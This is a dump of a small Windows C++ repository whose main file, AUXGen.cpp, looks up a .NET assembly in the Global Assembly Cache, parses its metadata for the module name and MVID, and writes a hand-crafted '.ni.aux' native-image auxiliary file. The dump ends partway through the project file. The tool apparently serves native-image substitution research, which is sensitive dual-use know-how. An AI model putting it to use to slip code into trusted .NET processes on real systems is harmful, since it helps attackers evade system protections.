[
  {
    "path": ".gitattributes",
    "content": "###############################################################################\n# Set default behavior to automatically normalize line endings.\n###############################################################################\n* text=auto\n\n###############################################################################\n# Set default behavior for command prompt diff.\n#\n# This is need for earlier builds of msysgit that does not have it on by\n# default for csharp files.\n# Note: This is only used by command line\n###############################################################################\n#*.cs     diff=csharp\n\n###############################################################################\n# Set the merge driver for project and solution files\n#\n# Merging from the command prompt will add diff markers to the files if there\n# are conflicts (Merging from VS is not affected by the settings below, in VS\n# the diff markers are never inserted). Diff markers may cause the following \n# file extensions to fail to load in VS. An alternative would be to treat\n# these files as binary and thus will always conflict and require user\n# intervention with every merge. 
To do so, just uncomment the entries below\n###############################################################################\n#*.sln       merge=binary\n#*.csproj    merge=binary\n#*.vbproj    merge=binary\n#*.vcxproj   merge=binary\n#*.vcproj    merge=binary\n#*.dbproj    merge=binary\n#*.fsproj    merge=binary\n#*.lsproj    merge=binary\n#*.wixproj   merge=binary\n#*.modelproj merge=binary\n#*.sqlproj   merge=binary\n#*.wwaproj   merge=binary\n\n###############################################################################\n# behavior for image files\n#\n# image files are treated as binary by default.\n###############################################################################\n#*.jpg   binary\n#*.png   binary\n#*.gif   binary\n\n###############################################################################\n# diff behavior for common document formats\n# \n# Convert binary document formats to text before diffing them. This feature\n# is only available from the command line. Turn it on by uncommenting the \n# entries below.\n###############################################################################\n#*.doc   diff=astextplain\n#*.DOC   diff=astextplain\n#*.docx  diff=astextplain\n#*.DOCX  diff=astextplain\n#*.dot   diff=astextplain\n#*.DOT   diff=astextplain\n#*.pdf   diff=astextplain\n#*.PDF   diff=astextplain\n#*.rtf   diff=astextplain\n#*.RTF   diff=astextplain\n"
  },
  {
    "path": ".gitignore",
    "content": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\n[Aa][Rr][Mm]/\n[Aa][Rr][Mm]64/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the project's static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUNIT\n*.VisualState.xml\nTestResult.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.meta\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.log\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# JustCode is a .NET coding add-in\n.JustCode\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Visual Studio 
code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3's project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!?*.[Cc]ache/\n\n# Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# 
(https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n*- Backup*.rdl\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# JetBrains Rider\n.idea/\n*.sln.iml\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n__pycache__/\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik's JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors 
(Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n\n# BeatPulse healthcheck temp database\nhealthchecksdb"
  },
  {
    "path": "AUXGen/AUXGen.cpp",
    "content": "#include <Windows.h>\n#include <fusion.h>\n#include <iostream>\n#include <string>\n#include <memory>\n#include <bitset>\n#include <ShlObj.h>\n#include <wrl.h>\nusing Microsoft::WRL::ComPtr;\n\ntemplate <class T, class D>\ninline D AlignTo(D data)\n{\n\tauto mask{ static_cast<D>(sizeof(T)) - 1 };\n\treturn (data + mask) & ~mask;\n}\n\n/* .NET CLR Runtime data structures and parsing information\n*\tInformation has been referenced from the following source:\n*\thttps://www.ecma-international.org/wp-content/uploads/ECMA-335_6th_edition_june_2012.pdf\n*/\n\ntypedef struct\n{\n\tULONG Signature;\n\tUSHORT MajorVersion;\n\tUSHORT MinorVersion;\n\tULONG Reserved;\n\tULONG Length;\n} METADATA_ROOT, * PMETADATA_ROOT;\n\ntypedef struct\n{\n\tULONG Offset;\n\tULONG Size;\n\tCHAR Name[ANYSIZE_ARRAY];\n} METADATA_STREAM_HEADER, * PMETADATA_STREAM_HEADER;\n\ntypedef struct\n{\n\tUSHORT Flags;\n\tUSHORT Streams;\n\tMETADATA_STREAM_HEADER StreamHeaders[ANYSIZE_ARRAY];\n} METADATA_ENDDATA, * PMETADATA_ENDDATA;\n\ntypedef struct\n{\n\tULONG Reserved0;\n\tBYTE MajorVersion;\n\tBYTE MinorVersion;\n\tBYTE HeapSizes;\n\tBYTE Reserved1;\n\tULONG64 Valid;\n\tULONG64 Sorted;\n\tULONG Rows[ANYSIZE_ARRAY];\n} LOGICAL_METADATA_STREAM, * PLOGICAL_METADATA_STREAM;\n\nint wmain(\n\tint argc,\n\tWCHAR* argv[]\n)\n{\n\tif (argc < 2)\n\t{\n\t\tstd::cout << \"Usage: AUXGen <name>\\n\";\n\t\treturn 0;\n\t}\n\n\tPWSTR winDir;\n\tauto hr{ SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &winDir) };\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"SHGetKnownFolderPath() failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\tstd::wstring path{ winDir };\n\tpath += L\"\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\\";\n\tCoTaskMemFree(winDir);\n\n\tstd::wstring currentDir;\n\tDWORD dirSize;\n\tif (!(dirSize = GetCurrentDirectoryW(0, nullptr)))\n\t{\n\t\tstd::wcout << L\"GetCurrentDirectoryW() (0) failed. 
Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\tcurrentDir.resize(dirSize);\n\tif (!(dirSize = GetCurrentDirectoryW(dirSize, &currentDir[0])))\n\t{\n\t\tstd::wcout << L\"GetCurrentDirectoryW() (1) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tif (!SetCurrentDirectoryW(path.c_str()))\n\t{\n\t\tstd::wcout << \"SetCurrentDirectoryW() (0) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr<IAssemblyEnum> asmEnum;\n\thr = CreateAssemblyEnum(&asmEnum, nullptr, nullptr, ASM_CACHE_GAC, nullptr);\n\tif (FAILED(hr))\n\t{\n\t\tstd::cout << \"CreateAssemblyEnum() failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr<IAssemblyCache> asmCache;\n\thr = CreateAssemblyCache(&asmCache, 0);\n\tif (FAILED(hr))\n\t{\n\t\tstd::cout << \"CreateAssemblyCache() failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr<IAssemblyName> asmName;\n\tstd::wstring name;\n\twhile ((hr = asmEnum->GetNextAssembly(nullptr, &asmName, 0)) == S_OK)\n\t{\n\t\tDWORD nameSize{};\n\t\thr = asmName->GetName(&nameSize, nullptr);\n\t\tif (hr != 0x8007007a && FAILED(hr))\n\t\t{\n\t\t\tasmName->Finalize();\n\t\t\tstd::wcout << L\"IAssemblyName::GetName() (0) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\t\treturn 1;\n\t\t}\n\n\t\tname.resize(nameSize - 1);\n\t\thr = asmName->GetName(&nameSize, &name[0]);\n\t\tif (FAILED(hr))\n\t\t{\n\t\t\tasmName->Finalize();\n\t\t\tstd::wcout << L\"IAssemblyName::GetName() (1) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\t\treturn 1;\n\t\t}\n\n\t\tif (wcscmp(argv[1], name.c_str()) == 0)\n\t\t\tbreak;\n\t\tasmName->Finalize();\n\t}\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyEnum::GetNextAssembly() failed. 
Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\tif (hr == S_FALSE)\n\t{\n\t\tstd::wcout << L\"'\" << argv[1] << L\"' not found in GAC\\n\";\n\t\treturn 0;\n\t}\n\n\tDWORD len{};\n\thr = asmName->GetDisplayName(nullptr, &len, 0);\n\tif (hr != 0x8007007a && FAILED(hr))\n\t{\n\t\tasmName->Finalize();\n\t\tstd::wcout << L\"IAssemblyName::GetDisplayName() (0) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::wstring displayName;\n\tdisplayName.resize(len - 1);\n\thr = asmName->GetDisplayName(&displayName[0], &len, 0);\n\tasmName->Finalize();\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyName::GetDisplayName() (1) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tASSEMBLY_INFO asmInfo{};\n\tasmInfo.cbAssemblyInfo = sizeof ASSEMBLY_INFO;\n\thr = asmCache->QueryAssemblyInfo(0, name.c_str(), &asmInfo);\n\tif (hr != 0x8007007a && FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyCache::QueryAssemblyInfo() (0) failed. Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::wstring asmPath;\n\tasmPath.resize(asmInfo.cchBuf - 1);\n\tasmInfo.pszCurrentAssemblyPathBuf = &asmPath[0];\n\thr = asmCache->QueryAssemblyInfo(0, name.c_str(), &asmInfo);\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"IAssemblyCache::QueryAssemblyInfo() (1) failed. 
Error: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\t/*\n\t * I would use the .NET unmanaged metadata COM interfaces to get the MVID,\n\t * however that requres .NET framework 3.5 which is not installed by default\n\t * on most systems, so instead I will manually parse the .NET directory of the\n\t * assembly and read the MVID that way.\n\t */\n\n\tstd::unique_ptr<void, decltype(&CloseHandle)> fileHandle{\n\t\tCreateFileW(asmInfo.pszCurrentAssemblyPathBuf, FILE_READ_ACCESS, FILE_SHARE_READ, nullptr, OPEN_EXISTING,\n\t\tFILE_ATTRIBUTE_NORMAL, nullptr),\n\t\tCloseHandle\n\t};\n\tif (fileHandle.get() == INVALID_HANDLE_VALUE)\n\t{\n\t\tstd::wcout << L\"CreateFileW() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::unique_ptr<void, decltype(&CloseHandle)> mapping{\n\t\tCreateFileMappingW(fileHandle.get(), nullptr, PAGE_READONLY | SEC_IMAGE_NO_EXECUTE, 0, 0, nullptr),\n\t\tCloseHandle\n\t};\n\tif (!mapping)\n\t{\n\t\tstd::wcout << L\"CreateFileMapping() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::unique_ptr<void, decltype(&UnmapViewOfFile)> file{\n\t\tMapViewOfFile(mapping.get(), FILE_MAP_READ, 0, 0, 0),\n\t\tUnmapViewOfFile\n\t};\n\tif (!file)\n\t{\n\t\tstd::wcout << L\"MapViewOfFile() failed. 
Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tauto corHeader{ reinterpret_cast<PIMAGE_COR20_HEADER>(\n\t\treinterpret_cast<PBYTE>(file.get()) +\n\t\treinterpret_cast<PIMAGE_NT_HEADERS32>(reinterpret_cast<PBYTE>(file.get())\n\t\t\t+ reinterpret_cast<PIMAGE_DOS_HEADER>(file.get())->e_lfanew)\n\t\t\t->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress\n\t\t) };\n\tauto metadataRoot{\n\t\treinterpret_cast<PMETADATA_ROOT>(reinterpret_cast<PBYTE>(file.get()) + corHeader->MetaData.VirtualAddress)\n\t};\n\tauto streamData{\n\t\treinterpret_cast<PMETADATA_ENDDATA>(reinterpret_cast<PBYTE>(metadataRoot)\n\t\t+ sizeof METADATA_ROOT + AlignTo<ULONG>(metadataRoot->Length))\n\t};\n\n\tPMETADATA_STREAM_HEADER streamHeader{ streamData->StreamHeaders }, metaStream{}, guidStream{}, stringStream{};\n\tbool foundStream{}, foundGuids{}, foundStrings{};\n\tfor (auto i = 1; i < streamData->Streams; ++i)\n\t{\n\t\tif (foundStream && foundGuids && foundStrings)\n\t\t\tbreak;\n\t\tif (strcmp(streamHeader->Name, \"#~\") == 0)\n\t\t{\n\t\t\tfoundStream = true;\n\t\t\tmetaStream = streamHeader;\n\t\t}\n\t\telse if (strcmp(streamHeader->Name, \"#GUID\") == 0)\n\t\t{\n\t\t\tfoundGuids = true;\n\t\t\tguidStream = streamHeader;\n\t\t}\n\t\telse if (strcmp(streamHeader->Name, \"#Strings\") == 0)\n\t\t{\n\t\t\tfoundStrings = true;\n\t\t\tstringStream = streamHeader;\n\t\t}\n\t\tstreamHeader = reinterpret_cast<PMETADATA_STREAM_HEADER>(\n\t\t\treinterpret_cast<PBYTE>(streamHeader) + FIELD_OFFSET(METADATA_STREAM_HEADER, Name)\n\t\t\t+ AlignTo<ULONG>(strlen(streamHeader->Name) + 1));\n\t}\n\tif (!foundStream)\n\t{\n\t\tstd::wcout << L\"CLI #~ stream not found\\n\";\n\t\treturn 1;\n\t}\n\tif (!foundGuids)\n\t{\n\t\tstd::wcout << L\"CLI #GUID stream not found\\n\";\n\t\treturn 1;\n\t}\n\tif (!foundStrings)\n\t{\n\t\tstd::wcout << L\"CLI #Strings stream not found\\n\";\n\t\treturn 1;\n\t}\n\n\tauto 
logicalMetadata{\n\t\treinterpret_cast<PLOGICAL_METADATA_STREAM>(reinterpret_cast<PBYTE>(metadataRoot)\n\t\t+ metaStream->Offset)\n\t};\n\tstd::bitset<64> validBits{ logicalMetadata->Valid };\n\tstd::bitset<8> heapSizeBits{ logicalMetadata->HeapSizes };\n\n\tif (!validBits[0])\n\t{\n\t\tstd::wcout << L\"Module table does not seem to be present in metadata\\n\";\n\t\treturn 1;\n\t}\n\n\tif (logicalMetadata->Rows[0] > 1)\n\t\tstd::wcout << L\"More than one Module entry exists, using the first one\\n\";\n\n\tauto tables{\n\t\treinterpret_cast<PBYTE>(logicalMetadata) + FIELD_OFFSET(LOGICAL_METADATA_STREAM, Rows)\n\t\t+ (validBits.count() * sizeof ULONG)\n\t};\n\n\tULONG mvidIndex, modNameIndex;\n\ttables += 2;\n\tif (heapSizeBits[0])\n\t{\n\t\tmodNameIndex = *reinterpret_cast<PULONG>(tables);\n\t\ttables += 4;\n\t}\n\telse\n\t{\n\t\tmodNameIndex = *reinterpret_cast<PUSHORT>(tables);\n\t\ttables += 2;\n\t}\n\tif (heapSizeBits[1])\n\t\tmvidIndex = *reinterpret_cast<PULONG>(tables);\n\telse\n\t\tmvidIndex = *reinterpret_cast<PUSHORT>(tables);\n\n\tauto guids{\n\t\treinterpret_cast<LPGUID>(reinterpret_cast<PBYTE>(metadataRoot) + guidStream->Offset)\n\t};\n\n\tstd::string modName{ reinterpret_cast<char*>(reinterpret_cast<PBYTE>(metadataRoot)\n\t\t+ stringStream->Offset + modNameIndex) };\n\n\tauto extensionPos{ modName.find_last_of('.') };\n\tif (extensionPos != std::string::npos)\n\t\tmodName.insert(extensionPos, \".ni\");\n\telse\n\t\tmodName += \".ni\";\n\n\tmodName += \".aux\";\n\n\tif (!SetCurrentDirectoryW(currentDir.c_str()))\n\t{\n\t\tstd::wcout << L\"SetCurrentDirectoryW() (1) failed. 
Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tauto auxSize{ 100 + AlignTo<ULONG>(len) };\n\tauto auxData{ std::make_unique<BYTE[]>(auxSize) };\n\tauto dataPtr{ reinterpret_cast<PULONG>(auxData.get()) };\n\tstd::unique_ptr<void, decltype(&CloseHandle)> auxFile{\n\t\tCreateFileA(modName.c_str(), FILE_WRITE_ACCESS, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr),\n\t\tCloseHandle\n\t};\n\tif (auxFile.get() == INVALID_HANDLE_VALUE)\n\t{\n\t\tstd::wcout << L\"CreateFileA() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tstd::string displayNameAnsi;\n\tdisplayNameAnsi.resize(len - 1);\n\tif (!WideCharToMultiByte(\n\t\tCP_ACP,\n\t\t0,\n\t\tdisplayName.c_str(),\n\t\tlen,\n\t\t&displayNameAnsi[0],\n\t\tstatic_cast<int>(displayNameAnsi.capacity()),\n\t\tnullptr,\n\t\tnullptr\n\t))\n\t{\n\t\tstd::wcout << L\"WideCharToMultiByte() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\t*dataPtr++ = 0x5;\n\t*dataPtr++ = auxSize - 8;\n\t*dataPtr++ = 0xB;\n\t*dataPtr++ = auxSize - 16;\n\t*dataPtr++ = 0xD;\n\t*dataPtr++ = auxSize - 100;\n\tmemcpy(dataPtr, displayNameAnsi.c_str(), displayNameAnsi.length() + 1);\n\n\tauto delta{ (auxSize - 100) - (displayNameAnsi.length() + 1) };\n\tif (delta)\n\t{\n\t\tauto ptr{\n\t\t\treinterpret_cast<PBYTE>(reinterpret_cast<PBYTE>(dataPtr) + displayNameAnsi.length() + 1)\n\t\t};\n\t\tfor (auto i = 1; i <= delta; ++i)\n\t\t{\n\t\t\t*ptr++ = 0xCC;\n\t\t}\n\t}\n\n\tdataPtr = reinterpret_cast<PULONG>(reinterpret_cast<PBYTE>(dataPtr) + delta + 1 + displayNameAnsi.length());\n\t*dataPtr++ = 0x7;\n\t*dataPtr++ = 0x4;\n\t*dataPtr++ = 0x1109;\n\t*dataPtr++ = 0x2;\n\t*dataPtr++ = 0x8;\n\t*dataPtr++ = 0;\n\t*dataPtr++ = 0;\n\t*dataPtr++ = 0xF;\n\t*dataPtr++ = 0x4;\n\t*dataPtr++ = 0;\n\t*dataPtr++ = 0x10;\n\t*dataPtr++ = 0x4;\n\t*dataPtr++ = 0x1;\n\t*dataPtr++ = 0x9;\n\t*dataPtr++ = 0x10;\n\tmemcpy(dataPtr, &guids[mvidIndex - 1], sizeof GUID);\n\n\tif (!WriteFile(auxFile.get(), 
auxData.get(), auxSize, &len, nullptr))\n\t{\n\t\tstd::wcout << L\"WriteFile() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn 1;\n\t}\n\n\tauto stdHandle{ GetStdHandle(STD_OUTPUT_HANDLE) };\n\n\tSetConsoleTextAttribute(stdHandle, 15);\n\n\tstd::wcout << L\"\\nAUX file\";\n\n\tSetConsoleTextAttribute(stdHandle, 14);\n\n\tstd::cout << \" '\" << modName << \"'\";\n\n\tSetConsoleTextAttribute(stdHandle, 15);\n\n\tstd::wcout << L\" generated successfully.\\n\";\n\n\tSetConsoleTextAttribute(stdHandle, 7);\n\n\treturn 0;\n}"
  },
  {
    "path": "AUXGen/AUXGen.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <Keyword>Win32Proj</Keyword>\n    <ProjectGuid>{b4192e53-737a-409e-96ab-7013f6863072}</ProjectGuid>\n    <RootNamespace>AUXGen</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" 
Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <AdditionalDependencies>fusion.lib;%(AdditionalDependencies)</AdditionalDependencies>\n      <DelayLoadDLLs>fusion.dll</DelayLoadDLLs>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      